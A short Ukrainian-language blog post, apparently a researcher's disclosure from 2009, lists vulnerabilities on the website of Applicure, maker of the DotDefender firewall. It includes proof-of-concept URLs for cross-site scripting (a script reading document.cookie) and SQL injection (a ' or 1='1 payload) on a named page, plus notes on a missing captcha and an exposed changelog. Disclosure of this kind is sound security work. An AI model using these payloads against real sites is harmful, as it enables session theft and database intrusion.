Уразливості на www.applicure.com

20:25 12.10.2009

17.06.2009

У квітні, 10.04.2008, я знайшов Insufficient Anti-automation, Cross-Site Scripting та SQL Injection уразливості, а 13.06.2009 ще Information Leakage уразливість на http://www.applicure.com - сайті секюріті компанії Applicure, виробника WAF DotDefender. Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

12.10.2009

Insufficient Anti-automation:

http://www.applicure.com/?page=monitorRegister

У формі був відсутній захист від автоматизованих запитів (капча).

XSS:

http://www.applicure.com/unMail.php?e=%3Cscript%3Ealert(document.cookie)%3C/script%3E

SQL Injection:

http://www.applicure.com/unMail.php?e=’%20or%201=’1

Information Leakage:

http://www.applicure.com/CHANGELOG.txt

Попередні уразливості були виправлені шляхом заміни движка на Drupal. А остання уразливість так досі й не була виправлена.


Leave a Reply

You must be logged in to post a comment.